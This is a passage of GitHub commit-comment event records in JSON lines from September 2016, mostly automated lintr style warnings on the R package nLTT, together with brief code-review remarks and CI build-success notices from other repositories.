colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:30:26:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                         ^\n```\n[tests/testthat/test_mcmc_nltt.R:30:32:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                               ^\n```\n[tests/testthat/test_mcmc_nltt.R:30:36:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                   ^\n```\n[tests/testthat/test_mcmc_nltt.R:30:42:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                         ^\n```\n[tests/testthat/test_mcmc_nltt.R:30:49:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                ^\n```\n[tests/testthat/test_mcmc_nltt.R:30:55:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                      ^\n```\n[tests/testthat/test_mcmc_nltt.R:30:65:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                               ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:30:72:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                       ^\n```\n[tests/testthat/test_mcmc_nltt.R:30:78:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                            ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:30:84:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                   ^\n```\n[tests/testthat/test_mcmc_nltt.R:30:92:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                          ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:30:95:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Commas should always have a space after.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                              ^\n```\n[tests/testthat/test_mcmc_nltt.R:30:100:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Put spaces around all infix operators.**\n```r\n​    colMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                                  ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:35:1:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/tests/testthat/test_mcmc_nltt.R#L35) *style:* **lines should not be more than 80 characters.**\n```r\n​  expect_equal( #compare jumps in log space with jumps in normal space, should yield similar results\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2016-09-14T11:25:39Z"}
{"id":"4561360118","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":19017244,"position":null,"line":null,"path":null,"commit_id":"08c75637edb3c38da12623ff302ea6824aa3f806","created_at":"2016-09-14T11:25:57Z","updated_at":"2016-09-14T11:25:57Z","body":"忽略release，取消忽略release/res"}},"created_at":"2016-09-14T11:25:57Z"}
{"id":"4561363121","type":"CommitCommentEvent","actor":{"login":"59azul"},"repo":{"name":"59azul/projetos_faculdade"},"payload":{"comment":{"id":19017252,"position":null,"line":null,"path":null,"commit_id":"1df71a6673126b652316a11d07192ad7d041fcee","created_at":"2016-09-14T11:26:44Z","updated_at":"2016-09-14T11:26:44Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;DYiAMe9k&#x2F;24-projeto-1-poo\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Projeto 1 - POO</a>"}},"created_at":"2016-09-14T11:26:44Z"}
{"id":"4561364013","type":"CommitCommentEvent","actor":{"login":"zhaoxile"},"repo":{"name":"MikuAuahDark/NPPS"},"payload":{"comment":{"id":19017257,"position":null,"line":null,"path":null,"commit_id":"b86dfb7cd10a05c268173183d03916763078924e","created_at":"2016-09-14T11:26:58Z","updated_at":"2016-09-14T11:26:58Z","body":"It presents\r\n![1](https://cloud.githubusercontent.com/assets/21981102/18510544/31bead80-7ab1-11e6-8b28-ec9f3515ff9b.png)\r\n"}},"created_at":"2016-09-14T11:26:58Z"}
{"id":"4561367899","type":"CommitCommentEvent","actor":{"login":"jnothman"},"repo":{"name":"scikit-learn/scikit-learn"},"payload":{"comment":{"id":19017273,"position":30,"line":607,"path":"sklearn/model_selection/_validation.py","commit_id":"8cfebf2e63b1369ee0caba93cbdd887b369dab50","created_at":"2016-09-14T11:27:56Z","updated_at":"2016-09-14T11:27:56Z","body":"It has the potential to use mutliprocessing better... I'm a bit meh about it, but it's not a bad thing. It's also not release-critical, so you can leave it in the PR space and people can vote :)"}},"created_at":"2016-09-14T11:27:56Z"}
{"id":"4561372465","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19017281,"position":null,"line":null,"path":null,"commit_id":"8ebfd73b887c7d50f45d0a984f69e7db06b5a413","created_at":"2016-09-14T11:29:03Z","updated_at":"2016-09-14T11:29:03Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 994](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13234&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:25"}},"created_at":"2016-09-14T11:29:03Z"}
{"id":"4561372546","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19017283,"position":null,"line":null,"path":null,"commit_id":"9a4dab11fde0a0944e72c3e7e1f157f6a37dabee","created_at":"2016-09-14T11:29:04Z","updated_at":"2016-09-14T11:29:04Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 995](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13238&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:20"}},"created_at":"2016-09-14T11:29:04Z"}
{"id":"4561374606","type":"CommitCommentEvent","actor":{"login":"bojidar-bg"},"repo":{"name":"CubeSploit/CubeSploit"},"payload":{"comment":{"id":19017289,"position":9,"line":28,"path":"global.gd","commit_id":"2bbd4c20432ba1a2a2b09d85e98dc84180271a72","created_at":"2016-09-14T11:29:34Z","updated_at":"2016-09-14T11:29:34Z","body":"You might use preload here :smile: "}},"created_at":"2016-09-14T11:29:34Z"}
{"id":"4561375446","type":"CommitCommentEvent","actor":{"login":"Pitterling"},"repo":{"name":"Pitterling/ksar"},"payload":{"comment":{"id":19017291,"position":null,"line":null,"path":null,"commit_id":"df010c331151ad48503b99551cf636e1e9729d61","created_at":"2016-09-14T11:29:46Z","updated_at":"2016-09-14T11:29:46Z","body":"former recent graph, now only for <8.1.5\r\n![image](https://cloud.githubusercontent.com/assets/4181164/18510503/b170c582-7a7e-11e6-998d-c5060d68a3d7.png)\r\n\r\nnew 8.1.5 graph\r\n![image](https://cloud.githubusercontent.com/assets/4181164/18510512/c4a816be-7a7e-11e6-8673-cc978837edc0.png)\r\n\r\nnew 9.1.7+ graph\r\n![image](https://cloud.githubusercontent.com/assets/4181164/18510605/36b5f12c-7a7f-11e6-8938-3dba2fa9d701.png)\r\n"}},"created_at":"2016-09-14T11:29:46Z"}
{"id":"4561375711","type":"CommitCommentEvent","actor":{"login":"mart-e"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19017292,"position":23,"line":46,"path":"addons/website/data/web_planner_data.xml","commit_id":"bfc3313bd5a166aadfcb5a05d05903f114ddc4f7","created_at":"2016-09-14T11:29:49Z","updated_at":"2016-09-14T11:29:49Z","body":"I doubt this is correct :wink: "}},"created_at":"2016-09-14T11:29:49Z"}
{"id":"4561376577","type":"CommitCommentEvent","actor":{"login":"bojidar-bg"},"repo":{"name":"CubeSploit/CubeSploit"},"payload":{"comment":{"id":19017293,"position":5,"line":5,"path":"global.gd","commit_id":"ead7fdbd32276d9daf811e09811a9e6693c44def","created_at":"2016-09-14T11:30:02Z","updated_at":"2016-09-14T11:30:02Z","body":"Why not uppercase though? It would make it more obvious that it is a constant"}},"created_at":"2016-09-14T11:30:02Z"}
{"id":"4561376685","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19017294,"position":null,"line":null,"path":null,"commit_id":"f629eb86ccb543d634d0614ef07142b3b86a1758","created_at":"2016-09-14T11:30:02Z","updated_at":"2016-09-14T11:30:02Z","body":"[R/ABC_SMC.R:280:26:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/R/ABC_SMC.R#L280) *style:* **Trailing whitespace is superfluous.**\n```r\n​  #check data type of phy \n                         ^\n```\n[R/ABC_SMC.R:287:1:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/R/ABC_SMC.R#L287) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:293:5:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/R/ABC_SMC.R#L293) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(parameters[2] < 0) {\n    ^\n```\n[R/ABC_SMC.R:295:24:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/R/ABC_SMC.R#L295) *style:* **Trailing whitespace is superfluous.**\n```r\n​    stop(\"mcmc_nltt: \", \n                       ^\n```\n[R/ABC_SMC.R:297:20:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/R/ABC_SMC.R#L297) *style:* **Commas should always have a space after.**\n```r\n​     \"but mu was \",parameters[2],\" instead\")\n                   ^\n```\n[R/ABC_SMC.R:297:34:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/R/ABC_SMC.R#L297) *style:* **Commas should always have a space after.**\n```r\n​     \"but mu was \",parameters[2],\" instead\")\n                                 ^\n```\n[R/ABC_SMC.R:340:1:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/R/ABC_SMC.R#L340) *style:* **Trailing whitespace is superfluous.**\n```r\n​        \n^~~~~~~~\n```\n[R/ABC_SMC.R:341:11:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/R/ABC_SMC.R#L341) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if(parameters[j] >= 0 & parameters[1] > 0) {        \n          ^\n```\n[R/ABC_SMC.R:341:52:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/R/ABC_SMC.R#L341) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​        if(parameters[j] >= 0 & parameters[1] > 0) {        \n                                                   ^\n```\n[R/ABC_SMC.R:341:53:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/R/ABC_SMC.R#L341) *style:* **Trailing whitespace is superfluous.**\n```r\n​        if(parameters[j] >= 0 & parameters[1] > 0) {        \n                                                    ^~~~~~~~\n```\n[R/ABC_SMC.R:343:1:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/R/ABC_SMC.R#L343) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_calculate_weight.R:7:6:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_calculate_weight.R#L7) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in 1:2) {\n     ^\n```\n[tests/testthat/test_calculate_weight.R:12:20:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_calculate_weight.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​    dunif(x[1], min=0, max=1000) *\n                  ~^~\n```\n[tests/testthat/test_calculate_weight.R:12:27:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_calculate_weight.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​    dunif(x[1], min=0, max=1000) *\n                         ~^~\n```\n[tests/testthat/test_calculate_weight.R:13:20:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_calculate_weight.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​    dunif(x[2], min=0, max=1000) }\n                  ~^~\n```\n[tests/testthat/test_calculate_weight.R:13:27:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_calculate_weight.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​    dunif(x[2], min=0, max=1000) }\n                         ~^~\n```\n[tests/testthat/test_calculate_weight.R:13:34:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_calculate_weight.R#L13) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​    dunif(x[2], min=0, max=1000) }\n                                 ^\n```\n[tests/testthat/test_calculate_weight.R:14:1:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_calculate_weight.R#L14) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_calculate_weight.R:16:1:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_calculate_weight.R#L16) *style:* **lines should not be more than 80 characters.**\n```r\n​    calculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:16:49:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_calculate_weight.R#L16) *style:* **Put spaces around all infix operators.**\n```r\n​    calculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n                                               ~^~\n```\n[tests/testthat/test_calculate_weight.R:16:92:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_calculate_weight.R#L16) *style:* **Commented code should be removed.**\n```r\n​    calculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n                                                                                           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_calculate_weight.R#L17) *style:* **lines should not be more than 80 characters.**\n```r\n​    calculate_weight(weights, particles, current=c(20, 20), sigma, prior_density_function), #so these should be equal, because jumping densities are symmetric (dnorm)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:17:49:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_calculate_weight.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​    calculate_weight(weights, particles, current=c(20, 20), sigma, prior_density_function), #so these should be equal, because jumping densities are symmetric (dnorm)\n                                               ~^~\n```\n[tests/testthat/test_calculate_weight.R:20:1:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_calculate_weight.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_calculate_weight.R:22:1:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_calculate_weight.R#L22) *style:* **lines should not be more than 80 characters.**\n```r\n​    calculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:22:49:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_calculate_weight.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​    calculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n                                               ~^~\n```\n[tests/testthat/test_calculate_weight.R:22:90:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_calculate_weight.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​    calculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n                                                                                         ^\n```\n[tests/testthat/test_calculate_weight.R:23:1:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_calculate_weight.R#L23) *style:* **lines should not be more than 80 characters.**\n```r\n​    calculate_weight(weights, particles, current=c(5.0, 5.0), sigma, prior_density_function),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:23:49:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_calculate_weight.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​    calculate_weight(weights, particles, current=c(5.0, 5.0), sigma, prior_density_function),\n                                               ~^~\n```\n[tests/testthat/test_calculate_weight.R:26:1:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_calculate_weight.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_calculate_weight.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_calculate_weight.R#L27) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_mcmc_nltt.R:7:29:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                           ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:7:32:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Commas should always have a space after.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                               ^\n```\n[tests/testthat/test_mcmc_nltt.R:7:37:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                   ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:7:41:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Commas should always have a space after.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                        ^\n```\n[tests/testthat/test_mcmc_nltt.R:7:44:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                          ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:7:49:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Commas should always have a space after.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                ^\n```\n[tests/testthat/test_mcmc_nltt.R:7:55:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                     ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:7:60:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Commas should always have a space after.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                           ^\n```\n[tests/testthat/test_mcmc_nltt.R:7:62:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​  p <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                            ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:29:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                           ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:32:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Commas should always have a space after.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                               ^\n```\n[tests/testthat/test_mcmc_nltt.R:8:37:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                   ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:41:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Commas should always have a space after.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                        ^\n```\n[tests/testthat/test_mcmc_nltt.R:8:44:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                          ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:49:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Commas should always have a space after.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                ^\n```\n[tests/testthat/test_mcmc_nltt.R:8:55:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                     ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:60:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Commas should always have a space after.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                           ^\n```\n[tests/testthat/test_mcmc_nltt.R:8:62:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​  q <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                            ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:24:1:](https://github.com/richelbilderbeek/nLTT/blob/f629eb86ccb543d634d0614ef07142b3b86a1758/tests/testthat/test_mcmc_nltt.R#L24) 